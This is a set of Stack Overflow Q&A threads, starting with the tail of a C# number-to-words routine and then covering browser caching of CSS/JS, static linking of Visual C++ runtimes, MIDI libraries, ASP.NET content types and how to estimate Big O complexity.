if (!string.IsNullOrWhiteSpace(dig3))
{
dig3 = string.Format("{0} {1}", dig3, GetSections(item.Key));
}
english = dig3 + english;
}
return english;
}
private static string Process3Digit(string digit3)
{
string result = string.Empty;
if (Convert.ToInt32(digit3) != 0)
{
int place = 0;
Stack<string> monetaryValue = new Stack<string>();
for (int i = digit3.Length - 1; i >= 0; i--)
{
place += 1;
string stringValue = string.Empty;
switch (place)
{
case 1:
stringValue = GetOnes(digit3[i].ToString());
break;
case 2:
int tens = Convert.ToInt32(digit3[i]);
if (tens == 1)
{
if (monetaryValue.Count > 0)
{
monetaryValue.Pop();
}
stringValue = GetTens((digit3[i].ToString() + digit3[i + 1].ToString()));
}
else
{
stringValue = GetTens(digit3[i].ToString());
}
break;
case 3:
stringValue = GetOnes(digit3[i].ToString());
if (!string.IsNullOrWhiteSpace(stringValue))
{
string postFixWith = " Hundred";
if (monetaryValue.Count > 0)
{
postFixWith = postFixWith + " And";
}
stringValue += postFixWith;
}
break;
}
if (!string.IsNullOrWhiteSpace(stringValue))
monetaryValue.Push(stringValue);
}
while (monetaryValue.Count > 0)
{
result += " " + monetaryValue.Pop().ToString().Trim();
}
}
return result;
}
private static Dictionary<int, string> Get3DigitList(string monetaryValueInNumberic)
{
Dictionary<int, string> hundredsStack = new Dictionary<int, string>();
int counter = 0;
while (monetaryValueInNumberic.Length >= 3)
{
string digit3 = monetaryValueInNumberic.Substring(monetaryValueInNumberic.Length - 3, 3);
monetaryValueInNumberic = monetaryValueInNumberic.Substring(0, monetaryValueInNumberic.Length - 3);
hundredsStack.Add(++counter, digit3);
}
if (monetaryValueInNumberic.Length != 0)
hundredsStack.Add(++counter, monetaryValueInNumberic);
return hundredsStack;
}
private static string GetTens(string tensPlaceValue)
{
string englishEquvalent = string.Empty;
int value = Convert.ToInt32(tensPlaceValue);
Dictionary<int, string> tens = new Dictionary<int, string>();
tens.Add(2, "Twenty");
tens.Add(3, "Thirty");
tens.Add(4, "Forty");
tens.Add(5, "Fifty");
tens.Add(6, "Sixty");
tens.Add(7, "Seventy");
tens.Add(8, "Eighty");
tens.Add(9, "Ninety");
tens.Add(10, "Ten");
tens.Add(11, "Eleven");
tens.Add(12, "Twelve");
tens.Add(13, "Thirteen");
tens.Add(14, "Fourteen");
tens.Add(15, "Fifteen");
tens.Add(16, "Sixteen");
tens.Add(17, "Seventeen");
tens.Add(18, "Eighteen");
tens.Add(19, "Nineteen");
if (tens.ContainsKey(value))
{
englishEquvalent = tens[value];
}
return englishEquvalent;
}
private static string GetOnes(string onesPlaceValue)
{
int value = Convert.ToInt32(onesPlaceValue);
string englishEquvalent = string.Empty;
Dictionary<int, string> ones = new Dictionary<int, string>();
ones.Add(1, " One");
ones.Add(2, " Two");
ones.Add(3, " Three");
ones.Add(4, " Four");
ones.Add(5, " Five");
ones.Add(6, " Six");
ones.Add(7, " Seven");
ones.Add(8, " Eight");
ones.Add(9, " Nine");
if (ones.ContainsKey(value))
{
englishEquvalent = ones[value];
}
return englishEquvalent;
}
private static string GetSections(int section)
{
string sectionName = string.Empty;
switch (section)
{
case 0:
sectionName = "Cents";
break;
case 1:
sectionName = "Dollars";
break;
case 2:
sectionName = "Thousand";
break;
case 3:
sectionName = "Million";
break;
case 4:
sectionName = "Billion";
break;
case 5:
sectionName = "Trillion";
break;
case 6:
sectionName = "Zillion";
break;
}
return sectionName;
}
private static bool ValidateInput(string input)
{
return Regex.IsMatch(input, "^[0-9]{1,18}(\\.[0-9]{1,2})?$");
}
}
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3213",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "62"
} |
Q: How can I make the browser see CSS and Javascript changes? CSS and Javascript files don't change very often, so I want them to be cached by the web browser. But I also want the web browser to see changes made to these files without requiring the user to clear their browser cache. Also want a solution that works well with a version control system such as Subversion.
Some solutions I have seen involve adding a version number to the end of the file in the form of a query string.
Could use the SVN revision number to automate this for you: ASP.NET Display SVN Revision Number
Can you specify how you include the Revision variable of another file? That is in the HTML file I can include the Revision number in the URL to the CSS or Javascript file.
In the Subversion book it says about Revision: "This keyword describes the last known revision in which this file changed in the repository".
Firefox also allows pressing CTRL+R to reload everything on a particular page.
To clarify I am looking for solutions that don't require the user to do anything on their part.
A: In my opinion, it is better to make the version number part of the file itself e.g. myscript.1.2.3.js. You can set your webserver to cache this file forever, and just add a new js file when you have a new version.
A: When you release a new version of your CSS or JS libraries, cause the following to occur:
*
*modify the filename to include a unique version string
*modify the HTML files which reference the library to point at the versioned file
(this is usually a pretty simple matter for a release script)
Now you can set the Expires for the CSS/JS to be years in the future. Whenever you change the content, if the referencing HTML points to a new URI, browsers will no longer use the old cached copy.
This causes the caching behavior you want without requiring anything of the user.
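For ASP.NET, a rough sketch of the same idea (the class and method names here are invented; a PHP variant appears in a later answer) is to bake the file's last-write time into the URI so it changes automatically whenever the file does:
using System;
using System.IO;
using System.Web;

public static class AssetUrl
{
    // Appends the file's last-write timestamp so the URI changes whenever
    // the content does; the file itself can then carry a far-future Expires header.
    public static string Versioned(string relativeUrl)
    {
        string physical = HttpContext.Current.Server.MapPath(relativeUrl);
        string stamp = File.GetLastWriteTimeUtc(physical).Ticks.ToString();
        return relativeUrl + "?v=" + stamp;
    }
}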
A: I was also wondering how to do this, when I found grom's answer. Thanks for the code.
I struggled with understanding how the code was supposed to be used. (I don't use a version control system.) In summary, you include the timestamp (ts) when you call the stylesheet. You're not planning on changing the stylesheet often:
<?php
include ('grom_file.php');
// timestamp on the filename has to be updated manually
include_css('_stylesheets/style.css?ts=20080912162813', 'all');
?>
A: I found that if you append the last modified timestamp of the file onto the end of the URL the browser will request the files when it is modified. For example in PHP:
function urlmtime($url) {
$parsed_url = parse_url($url);
$path = $parsed_url['path'];
if ($path[0] == "/") {
$filename = $_SERVER['DOCUMENT_ROOT'] . "/" . $path;
} else {
$filename = $path;
}
if (!file_exists($filename)) {
// If not a file then use the current time
$lastModified = date('YmdHis');
} else {
$lastModified = date('YmdHis', filemtime($filename));
}
if (strpos($url, '?') === false) {
$url .= '?ts=' . $lastModified;
} else {
$url .= '&ts=' . $lastModified;
}
return $url;
}
function include_css($css_url, $media='all') {
// According to Yahoo, using link allows for progressive
// rendering in IE where as @import url($css_url) does not
echo '<link rel="stylesheet" type="text/css" media="' .
$media . '" href="' . urlmtime($css_url) . '">'."\n";
}
function include_javascript($javascript_url) {
echo '<script type="text/javascript" src="' . urlmtime($javascript_url) .
'"></script>'."\n";
}
A: Some solutions I have seen involve adding a version number to the end of the file in the form of a query string.
<script type="text/javascript" src="funkycode.js?v1">
You could use the SVN revision number to automate this for you by including the word LastChangedRevision in your html file after where v1 appears above. You must also setup your repository to do this.
I hope this further clarifies my answer?
Firefox also allows pressing CTRL + R to reload everything on a particular page.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3224",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "64"
} |
Q: How do you pack a visual studio c++ project for release? I'm wondering how to make a release build that includes all necessary dll files into the .exe so the program can be run on a non-development machine without it having to install the microsoft redistributable on the target machine.
Without doing this you get the error message that the application configuration is not correct and to reinstall.
A: Be aware that Microsoft do not recommend that you static link the runtime into your project, as this prevents it from being serviced by windows update to fix critical security bugs. There are also potential problems if you are passing memory between your main .exe and .dll files as if each of these static links the runtime you can end up with malloc/free mismatch problems.
You can include the DLLs with the executable, without compiling them into the .exe and without running the redist tool - this is what I do and it seems to work fine.
The only fly in the ointment is that you need to include the files twice if you're distributing for a wide range of Windows versions - newer OSs need the files in manifest-defined directories, and older ones want all the files in the program directory.
A: *
*Choose Project -> Properties
*Select Configuration Properties -> General
*In the "Use of MFC" box, choose to statically link MFC.
*Choose Linker -> Input. Under Additional Dependencies, add any libraries you need your app to statically link in.
A: You need to set the run-time library (Under C/C++ -> Code Generation) for ALL projects to static linkage, which correlates to the following default building configurations:
*
*Multithreaded Debug/Release
*Singlethreaded Debug/Release
As opposed to the "DLL" versions of those libraries.
Even if you do that, depending on the libraries you're using, you might have to install a Merge Module/framework/etc. It depends on whether static LIB versions of your dependencies are available.
A: You'd be looking to static link (as opposed to dynamically link)
I'm not sure how many of the MS redistributables can be statically linked in.
A: If you are looking to find out which dll's your target machine is missing then use depends.exe which used to come with MSDev, but can also be found here. Testing this on a few target machines should tell you which dll's you need to package with your application.
A: You should use a static link and add all libraries you need under additional dependencies.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3230",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "38"
} |
Q: C/C++ library for reading MIDI signals from a USB MIDI device I want to write C/C++ programs that take input from a MIDI device.
The MIDI device connects to my PC using a USB connector.
I'm looking for a (C/C++ implemented) library that I can use to read the MIDI signals from the MIDI device through the USB port.
I'm happy manipulating the MIDI data once I get it, I just don't want to have to implement the code for its capture.
I'm planning on writing my code using the Bloodshed Dev-C++ IDE on Windows XP.
A: PortMidi is another open source cross-platform MIDI I/O library worth checking out. On the other hand, if you are working on a sysex type of app, then direct Win32 works easily enough.
Just came across another open source cross-platform framework that includes MIDI support: Juce.
Also, I should note that there isn't anything special about a USB connected MIDI device. It will still be presented as a MIDI device in Windows and you will use standard MIDI APIs (mmsystem) to communicate with it.
[July 2014] I just came across RtMidi that looks to be a nice, compact, open source cross-platform C++ library.
A: Check out the open source project LMMS. It's a music studio for Linux that includes the ability to use MIDI keyboards with software instruments. If you dig around in source files with 'midi' in the name, you'll probably find what you're looking for.
A: Maybe the Jack source code may help too. It's a sound driver for Posix compatible systems with a lot of possibilities and supports USB and Firewire audio devices.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3231",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "31"
} |
Q: Displaying file content from Response.WriteFile() / Response.ContentType How would one display arbitrary file content from a "dynamic" aspx page? Currently I am working on using the System.Web.HttpResponse "Page.Response" to write a file that is stored on a web server to a web request.
This would allow people to hit a url of the type http://www.foo.com?Image=test.jpg and have the image display in their browser. So as you may know this revolves around the use of Response.ContentType.
By using
Response.ContentType = "application/octet-stream";
I am able to display images of type gif/jpeg/png (all I have tested so far), but trying to display .swf or .ico files gives me a nice little error.
using
Response.ContentType = "application/x-shockwave-flash";
I can get flash files to play, but then the images are messed up.
So how do I easily choose the correct ContentType?
A: This is ugly, but the best way is to look at the file and set the content type as appropriate:
switch ( fileExtension )
{
case "pdf": Response.ContentType = "application/pdf"; break;
case "swf": Response.ContentType = "application/x-shockwave-flash"; break;
case "gif": Response.ContentType = "image/gif"; break;
case "jpeg": Response.ContentType = "image/jpg"; break;
case "jpg": Response.ContentType = "image/jpg"; break;
case "png": Response.ContentType = "image/png"; break;
case "mp4": Response.ContentType = "video/mp4"; break;
case "mpeg": Response.ContentType = "video/mpeg"; break;
case "mov": Response.ContentType = "video/quicktime"; break;
case "wmv":
case "avi": Response.ContentType = "video/x-ms-wmv"; break;
//and so on
default: Response.ContentType = "application/octet-stream"; break;
}
A: This is part of a solution I use on a local intranet. Some of the variables you will have to collect yourself as I pull them from a database but you may pull them from somewhere else.
The only extra bit I've got in there is a function called getMimeType which connects to the database and pulls back the correct mime type based on file extension. This defaults to application/octet-stream if none is found.
// Clear the response buffer in case there is anything already in it.
Response.Clear();
Response.Buffer = true;
// Read the original file from disk
FileStream myFileStream = new FileStream(sPath, FileMode.Open);
long FileSize = myFileStream.Length;
byte[] Buffer = new byte[(int)FileSize];
myFileStream.Read(Buffer, 0, (int)FileSize);
myFileStream.Close();
// Tell the browser about the file
Response.AddHeader("Content-Length", FileSize.ToString());
Response.AddHeader("Content-Disposition", "inline; filename=" + sFilename.Replace(" ","_"));
Response.ContentType = getMimeType(sExtention, oConnection);
// Send the data to the browser
Response.BinaryWrite(Buffer);
Response.End();
A: Yup Keith, ugly but true. I ended up placing the MIME types that we would use into a database and then pulling them out when I was publishing a file. I still can't believe that there is no authoritative list of types out there, or that there is no mention of what is available in MSDN.
I found this site that provided some help.
A: Since .Net 4.5 one can use
MimeMapping.GetMimeMapping
It returns the MIME mapping for the specified file name.
https://learn.microsoft.com/en-us/dotnet/api/system.web.mimemapping.getmimemapping
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3234",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "21"
} |
Q: Big O, how do you calculate/approximate it? Most people with a degree in CS will certainly know what Big O stands for.
It helps us to measure how well an algorithm scales.
But I'm curious, how do you calculate or approximate the complexity of your algorithms?
A: Less useful generally, I think, but for the sake of completeness there is also a Big Omega Ω, which defines a lower-bound on an algorithm's complexity, and a Big Theta Θ, which defines both an upper and lower bound.
A: Big O notation is useful because it's easy to work with and hides unnecessary complications and details (for some definition of unnecessary). One nice way of working out the complexity of divide and conquer algorithms is the tree method. Let's say you have a version of quicksort with the median procedure, so you split the array into perfectly balanced subarrays every time.
Now build a tree corresponding to all the arrays you work with. At the root you have the original array, the root has two children which are the subarrays. Repeat this until you have single element arrays at the bottom.
Since we can find the median in O(n) time and split the array in two parts in O(n) time, the work done at each node is O(k) where k is the size of the array. Each level of the tree contains (at most) the entire array, so the work per level is O(n) (the sizes of the subarrays add up to n, and since we do O(k) work per node we can add this up). There are only log(n) levels in the tree since each time we halve the input.
Therefore we can upper bound the amount of work by O(n*log(n)).
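As a rough numerical check of the tree argument (a sketch, not a proof; it assumes perfectly balanced splits and counts the O(k) work at a node of size k as exactly k):
import math

def balanced_quicksort_work(n):
    # k units of work at a node of size k (find median + partition), then two half-size children
    if n <= 1:
        return 0
    return n + 2 * balanced_quicksort_work(n // 2)

for n in (16, 256, 4096):
    print(n, balanced_quicksort_work(n), round(n * math.log2(n)))  # the two counts track each other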
However, Big O hides some details which we sometimes can't ignore. Consider computing the Fibonacci sequence with
a=0;
b=1;
for (i = 0; i <n; i++) {
tmp = b;
b = a + b;
a = tmp;
}
and let's just assume that a and b are BigIntegers in Java, or something that can handle arbitrarily large numbers. Most people would say this is an O(n) algorithm without flinching. The reasoning is that you have n iterations in the for loop and O(1) work inside the loop.
But Fibonacci numbers are large, the n-th Fibonacci number is exponential in n so just storing it will take on the order of n bytes. Performing addition with big integers will take O(n) amount of work. So the total amount of work done in this procedure is
1 + 2 + 3 + ... + n = n(n+1)/2 = O(n^2)
So this algorithm runs in quadratic time!
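You can watch the hidden cost grow directly (a quick sketch; Python integers are arbitrary-precision, so bit_length() shows the size of each operand):
a, b = 0, 1
for i in range(1, 101):
    a, b = b, a + b
    if i % 20 == 0:
        # the bit length grows roughly linearly in i, so each addition costs O(i) work
        print(i, b.bit_length())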
A: Familiarity with the algorithms/data structures I use and/or quick glance analysis of iteration nesting. The difficulty is when you call a library function, possibly multiple times - you can often be unsure of whether you are calling the function unnecessarily at times or what implementation they are using. Maybe library functions should have a complexity/efficiency measure, whether that be Big O or some other metric, that is available in documentation or even IntelliSense.
A: Break down the algorithm into pieces you know the big O notation for, and combine through big O operators. That's the only way I know of.
For more information, check the Wikipedia page on the subject.
A: As to "how do you calculate" Big O, this is part of Computational complexity theory. For some (many) special cases you may be able to come with some simple heuristics (like multiplying loop counts for nested loops), esp. when all you want is any upper bound estimation, and you do not mind if it is too pessimistic - which I guess is probably what your question is about.
If you really want to answer your question for any algorithm the best you can do is to apply the theory. Besides of simplistic "worst case" analysis I have found Amortized analysis very useful in practice.
A: For the 1st case, the inner loop is executed n-i times, so the total number of executions is the sum for i going from 0 to n-1 (because lower than, not lower than or equal) of the n-i. You get finally n*(n + 1) / 2, so O(n²/2) = O(n²).
For the 2nd case, i goes from 0 to n inclusive in the outer loop; the inner loop then only executes when j is strictly greater than n, which is impossible.
A: I would like to explain the Big-O in a little bit different aspect.
Big-O is just for comparing the complexity of programs, meaning how fast they grow when the inputs increase, not the exact time spent performing the action.
IMHO, in big-O formulas you had better not use more complex equations (you might just stick to the ones in the following graph). However, you can still use other, more precise formulas (like 3^n, n^3, ...), but more than that can sometimes be misleading! So it's better to keep it as simple as possible.
I would like to emphasize once again that here we don't want to get an exact formula for our algorithm. We only want to show how it grows when the inputs are growing and compare with the other algorithms in that sense. Otherwise you would better use different methods like bench-marking.
A: Small reminder: the big O notation is used to denote asymptotic complexity (that is, when the size of the problem grows to infinity), and it hides a constant.
This means that between an algorithm in O(n) and one in O(n²), the fastest is not always the first one (though there always exists a value of n such that for problems of size >n, the first algorithm is the fastest).
Note that the hidden constant very much depends on the implementation!
Also, in some cases, the runtime is not a deterministic function of the size n of the input. Take sorting using quick sort for example: the time needed to sort an array of n elements is not a constant but depends on the starting configuration of the array.
There are different time complexities:
*
*Worst case (usually the simplest to figure out, though not always very meaningful)
*Average case (usually much harder to figure out...)
*...
A good introduction is An Introduction to the Analysis of Algorithms by R. Sedgewick and P. Flajolet.
As you say, premature optimisation is the root of all evil, and (if possible) profiling really should always be used when optimising code. It can even help you determine the complexity of your algorithms.
A: In addition to using the master method (or one of its specializations), I test my algorithms experimentally. This can't prove that any particular complexity class is achieved, but it can provide reassurance that the mathematical analysis is appropriate. To help with this reassurance, I use code coverage tools in conjunction with my experiments, to ensure that I'm exercising all the cases.
As a very simple example say you wanted to do a sanity check on the speed of the .NET framework's list sort. You could write something like the following, then analyze the results in Excel to make sure they did not exceed an n*log(n) curve.
In this example I measure the number of comparisons, but it's also prudent to examine the actual time required for each sample size. However then you must be even more careful that you are just measuring the algorithm and not including artifacts from your test infrastructure.
int nCmp = 0;
System.Random rnd = new System.Random();
// measure the time required to sort a list of n integers
void DoTest(int n)
{
List<int> lst = new List<int>(n);
for( int i=0; i<n; i++ )
    lst.Add( rnd.Next(0,1000) ); // use Add(): the constructor argument only sets capacity
// as we sort, keep track of the number of comparisons performed!
nCmp = 0;
lst.Sort( delegate( int a, int b ) { nCmp++; return (a<b)?-1:((a>b)?1:0); } );
System.Console.WriteLine( "{0},{1}", n, nCmp );
}
// Perform measurement for a variety of sample sizes.
// It would be prudent to check multiple random samples of each size, but this is OK for a quick sanity check
for( int n = 0; n<1000; n++ )
DoTest(n);
A: Don't forget to also allow for space complexities, which can also be a cause for concern if one has limited memory resources. So for example you may hear someone wanting a constant-space algorithm, which is basically a way of saying that the amount of space taken by the algorithm doesn't grow with the size of the input.
Sometimes the complexity can come from how many times something is called, how often a loop is executed, how often memory is allocated, and so on; that is another part of answering this question.
Lastly, big O can be used for worst case, best case, and amortization cases where generally it is the worst case that is used for describing how bad an algorithm may be.
A: First of all, the accepted answer is trying to explain nice fancy stuff,
but I think, intentionally complicating Big-Oh is not the solution,
which programmers (or at least, people like me) search for.
Big Oh (in short)
function f(text) {
var n = text.length;
for (var i = 0; i < n; i++) {
f(text.slice(0, n-1))
}
// ... other JS logic here, which we can ignore ...
}
Big Oh of above is f(n) = O(n!) where n represents number of items in input set,
and f represents operation done per item.
Big-Oh notation is the asymptotic upper-bound of the complexity of an algorithm.
In programming: The assumed worst-case time taken,
or assumed maximum repeat count of logic, for size of the input.
Calculation
Keep in mind (from above meaning) that; We just need worst-case time and/or maximum repeat count affected by N (size of input),
Then take another look at (accepted answer's) example:
for (i = 0; i < 2*n; i += 2) { // line 123
for (j=n; j > i; j--) { // line 124
foo(); // line 125
}
}
*
*Begin with this search-pattern:
*
*Find first line that N caused repeat behavior,
*Or caused increase of logic executed,
*But constant or not, ignore anything before that line.
*Seems line hundred-twenty-three is what we are searching ;-)
*
*On first sight, line seems to have 2*n max-looping.
*But looking again, we see i += 2 (and that half is skipped).
*So, max repeat is simply n, write it down, like f(n) = O( n but don't close parenthesis yet.
*Repeat search till method's end, and find next line matching our search-pattern, here that's line 124
*
*Which is tricky, because strange condition, and reverse looping.
*But after remembering that we just need to consider maximum repeat count (or worst-case time taken).
*It's as easy as saying "Reverse-Loop j starts with j=n, am I right? yes, n seems to be maximum possible repeat count", so:
*
*Add n to previous write down's end,
*but like "( n " instead of "+ n" (as this is inside previous loop),
*and close parenthesis only if we find something outside of previous loop.
Search Done! why? because line 125 (or any other line after) does not match our search-pattern.
We can now close any parenthesis (left-open in our write down), resulting in below:
f(n) = O( n( n ) )
Try to further shorten "n( n )" part, like:
*
*n( n ) = n * n
*= n²
*Finally, just wrap it with Big Oh notation, like O(n²), or O(n^2) without formatting.
A: Seeing the answers here I think we can conclude that most of us do indeed approximate the order of the algorithm by looking at it and use common sense instead of calculating it with, for example, the master method as we were taught at university.
With that said I must add that even the professor encouraged us (later on) to actually think about it instead of just calculating it.
Also I would like to add how it is done for recursive functions:
suppose we have a function like (scheme code):
(define (fac n)
(if (= n 0)
1
(* n (fac (- n 1)))))
which recursively calculates the factorial of the given number.
The first step is to try and determine the performance characteristic for the body of the function only in this case, nothing special is done in the body, just a multiplication (or the return of the value 1).
So the performance for the body is: O(1) (constant).
Next try and determine this for the number of recursive calls. In this case we have n-1 recursive calls.
So the performance for the recursive calls is: O(n-1) (order is n, as we throw away the insignificant parts).
Then put those two together and you then have the performance for the whole recursive function:
1 * (n-1) = O(n)
Peter, to answer your raised issues; the method I describe here actually handles this quite well. But keep in mind that this is still an approximation and not a full mathematically correct answer. The method described here is also one of the methods we were taught at university, and if I remember correctly was used for far more advanced algorithms than the factorial I used in this example.
Of course it all depends on how well you can estimate the running time of the body of the function and the number of recursive calls, but that is just as true for the other methods.
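As a quick illustrative check (a sketch in Python, not part of the method itself), an instrumented factorial that counts its multiplications shows the linear growth directly:
def fac_steps(n):
    # returns (n!, number of multiplications); the count is exactly n, i.e. O(n)
    if n == 0:
        return 1, 0
    val, steps = fac_steps(n - 1)
    return n * val, steps + 1

for n in (5, 10, 20):
    print(n, fac_steps(n)[1])  # prints 5, 10, 20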
A: What often gets overlooked is the expected behavior of your algorithms. It doesn't change the Big-O of your algorithm, but it does relate to the statement "premature optimization..."
Expected behavior of your algorithm is -- very dumbed down -- how fast you can expect your algorithm to work on data you're most likely to see.
For instance, if you're searching for a value in a list, it's O(n), but if you know that most lists you see have your value up front, typical behavior of your algorithm is faster.
To really nail it down, you need to be able to describe the probability distribution of your "input space" (if you need to sort a list, how often is that list already going to be sorted? how often is it totally reversed? how often is it mostly sorted?) It's not always feasible that you know that, but sometimes you do.
A: great question!
Disclaimer: this answer contains false statements; see the comments below.
If you're using the Big O, you're talking about the worst case (more on what that means later). Additionally, there is capital theta for average case and a big omega for best case.
Check out this site for a lovely formal definition of Big O: https://xlinux.nist.gov/dads/HTML/bigOnotation.html
f(n) = O(g(n)) means there are positive constants c and k, such that 0 ≤ f(n) ≤ cg(n) for all n ≥ k. The values of c and k must be fixed for the function f and must not depend on n.
Ok, so now what do we mean by "best-case" and "worst-case" complexities?
This is probably most clearly illustrated through examples. For example if we are using linear search to find a number in a sorted array then the worst case is when we decide to search for the last element of the array as this would take as many steps as there are items in the array. The best case would be when we search for the first element since we would be done after the first check.
The point of all these adjective-case complexities is that we're looking for a way to graph the amount of time a hypothetical program runs to completion in terms of the size of particular variables. However for many algorithms you can argue that there is not a single time for a particular size of input. Notice that this contradicts with the fundamental requirement of a function, any input should have no more than one output. So we come up with multiple functions to describe an algorithm's complexity. Now, even though searching an array of size n may take varying amounts of time depending on what you're looking for in the array and depending proportionally to n, we can create an informative description of the algorithm using best-case, average-case, and worst-case classes.
Sorry this is so poorly written and lacks much technical information. But hopefully it'll make time complexity classes easier to think about. Once you become comfortable with these it becomes a simple matter of parsing through your program and looking for things like for-loops that depend on array sizes and reasoning based on your data structures what kind of input would result in trivial cases and what input would result in worst-cases.
A: If your cost is a polynomial, just keep the highest-order term, without its multiplier. E.g.:
O((n/2 + 1)*(n/2)) = O(n²/4 + n/2) = O(n²/4) = O(n²)
This doesn't work for infinite series, mind you. There is no single recipe for the general case, though for some common cases, the following inequalities apply:
O(log N) < O(N) < O(N log N) < O(N²) < O(N^k) < O(e^n) < O(n!)
A: I think about it in terms of information. Any problem consists of learning a certain number of bits.
Your basic tool is the concept of decision points and their entropy. The entropy of a decision point is the average information it will give you. For example, if a program contains a decision point with two branches, its entropy is the sum of the probability of each branch times the log2 of the inverse probability of that branch. That's how much you learn by executing that decision.
For example, an if statement having two branches, both equally likely, has an entropy of 1/2 * log(2/1) + 1/2 * log(2/1) = 1/2 * 1 + 1/2 * 1 = 1. So its entropy is 1 bit.
Suppose you are searching a table of N items, like N=1024. That is a 10-bit problem because log(1024) = 10 bits. So if you can search it with IF statements that have equally likely outcomes, it should take 10 decisions.
That's what you get with binary search.
Suppose you are doing linear search. You look at the first element and ask if it's the one you want. The probabilities are 1/1024 that it is, and 1023/1024 that it isn't. The entropy of that decision is 1/1024*log(1024/1) + 1023/1024 * log(1024/1023) = 1/1024 * 10 + 1023/1024 * about 0 = about .01 bit. You've learned very little! The second decision isn't much better. That is why linear search is so slow. In fact it's exponential in the number of bits you need to learn.
Suppose you are doing indexing. Suppose the table is pre-sorted into a lot of bins, and you use some of all of the bits in the key to index directly to the table entry. If there are 1024 bins, the entropy is 1/1024 * log(1024) + 1/1024 * log(1024) + ... for all 1024 possible outcomes. This is 1/1024 * 10 times 1024 outcomes, or 10 bits of entropy for that one indexing operation. That is why indexing search is fast.
Now think about sorting. You have N items, and you have a list. For each item, you have to search for where the item goes in the list, and then add it to the list. So sorting takes roughly N times the number of steps of the underlying search.
So sorts based on binary decisions having roughly equally likely outcomes all take about O(N log N) steps. An O(N) sort algorithm is possible if it is based on indexing search.
I've found that nearly all algorithmic performance issues can be looked at in this way.
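A minimal sketch of the entropy calculation used above (in Python; the probability lists are the examples from the text):
import math

def entropy(probs):
    # average information (in bits) gained from one decision with these branch probabilities
    return sum(p * math.log2(1 / p) for p in probs if p > 0)

print(entropy([0.5, 0.5]))               # a balanced if-statement: 1 bit
print(entropy([1 / 1024, 1023 / 1024]))  # one linear-search comparison: ~0.011 bits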
A: Let's start from the beginning.
First of all, accept the principle that certain simple operations on data can be done in O(1) time, that is, in time that is independent of the size of the input. These primitive operations in C consist of
*
*Arithmetic operations (e.g. + or %).
*Logical operations (e.g., &&).
*Comparison operations (e.g., <=).
*Structure accessing operations (e.g. array-indexing like A[i], or pointer following with the -> operator).
*Simple assignment such as copying a value into a variable.
*Calls to library functions (e.g., scanf, printf).
The justification for this principle requires a detailed study of the machine instructions (primitive steps) of a typical computer. Each of the described operations can be done with some small number of machine instructions; often only one or two instructions are needed.
As a consequence, several kinds of statements in C can be executed in O(1) time, that is, in some constant amount of time independent of input. These simple statements include
*
*Assignment statements that do not involve function calls in their expressions.
*Read statements.
*Write statements that do not require function calls to evaluate arguments.
*The jump statements break, continue, goto, and return expression, where
expression does not contain a function call.
In C, many for-loops are formed by initializing an index variable to some value and
incrementing that variable by 1 each time around the loop. The for-loop ends when
the index reaches some limit. For instance, the for-loop
for (i = 0; i < n-1; i++)
{
small = i;
for (j = i+1; j < n; j++)
if (A[j] < A[small])
small = j;
temp = A[small];
A[small] = A[i];
A[i] = temp;
}
uses index variable i. It increments i by 1 each time around the loop, and the iterations
stop when i reaches n − 1.
However, for the moment, focus on the simple form of for-loop, where the difference between the final and initial values, divided by the amount by which the index variable is incremented tells us how many times we go around the loop. That count is exact, unless there are ways to exit the loop via a jump statement; it is an upper bound on the number of iterations in any case.
For instance, the for-loop iterates ((n − 1) − 0)/1 = n − 1 times,
since 0 is the initial value of i, n − 1 is the highest value reached by i (i.e., when i
reaches n−1, the loop stops and no iteration occurs with i = n−1), and 1 is added
to i at each iteration of the loop.
In the simplest case, where the time spent in the loop body is the same for each
iteration, we can multiply the big-oh upper bound for the body by the number of
times around the loop. Strictly speaking, we must then add O(1) time to initialize
the loop index and O(1) time for the first comparison of the loop index with the
limit, because we test one more time than we go around the loop. However, unless
it is possible to execute the loop zero times, the time to initialize the loop and test
the limit once is a low-order term that can be dropped by the summation rule.
Now consider this example:
(1) for (j = 0; j < n; j++)
(2) A[i][j] = 0;
We know that line (1) takes O(1) time. Clearly, we go around the loop n times, as
we can determine by subtracting the lower limit from the upper limit found on line
(1) and then adding 1. Since the body, line (2), takes O(1) time, we can neglect the
time to increment j and the time to compare j with n, both of which are also O(1).
Thus, the running time of lines (1) and (2) is the product of n and O(1), which is O(n).
Similarly, we can bound the running time of the outer loop consisting of lines
(2) through (4), which is
(2) for (i = 0; i < n; i++)
(3) for (j = 0; j < n; j++)
(4) A[i][j] = 0;
We have already established that the loop of lines (3) and (4) takes O(n) time.
Thus, we can neglect the O(1) time to increment i and to test whether i < n in
each iteration, concluding that each iteration of the outer loop takes O(n) time.
The initialization i = 0 of the outer loop and the (n + 1)st test of the condition
i < n likewise take O(1) time and can be neglected. Finally, we observe that we go
around the outer loop n times, taking O(n) time for each iteration, giving a total
O(n^2) running time.
A more practical example.
A: Big O gives the upper bound for time complexity of an algorithm. It is usually used in conjunction with processing data sets (lists) but can be used elsewhere.
A few examples of how it's used in C code.
Say we have an array of n elements
int array[n];
If we wanted to access the first element of the array this would be O(1) since it doesn't matter how big the array is, it always takes the same constant time to get the first item.
x = array[0];
If we wanted to find a number in the list:
for(int i = 0; i < n; i++){
if(array[i] == numToFind){ return i; }
}
This would be O(n) since at most we would have to look through the entire list to find our number. The Big-O is still O(n) even though we might find our number the first try and run through the loop once because Big-O describes the upper bound for an algorithm (omega is for lower bound and theta is for tight bound).
When we get to nested loops:
for(int i = 0; i < n; i++){
for(int j = i; j < n; j++){
array[j] += 2;
}
}
This is O(n^2) since for each pass of the outer loop ( O(n) ) we have to go through the entire list again so the n's multiply leaving us with n squared.
This is barely scratching the surface but when you get to analyzing more complex algorithms complex math involving proofs comes into play. Hope this familiarizes you with the basics at least though.
A: For code A, the outer loop will execute n+1 times; the extra '1' is the final check of whether i still meets the condition. The inner loop runs n times, then n-2 times, and so on. Thus, 0+2+...+(n-2)+n = (0+n)(n/2+1)/2 = O(n²).
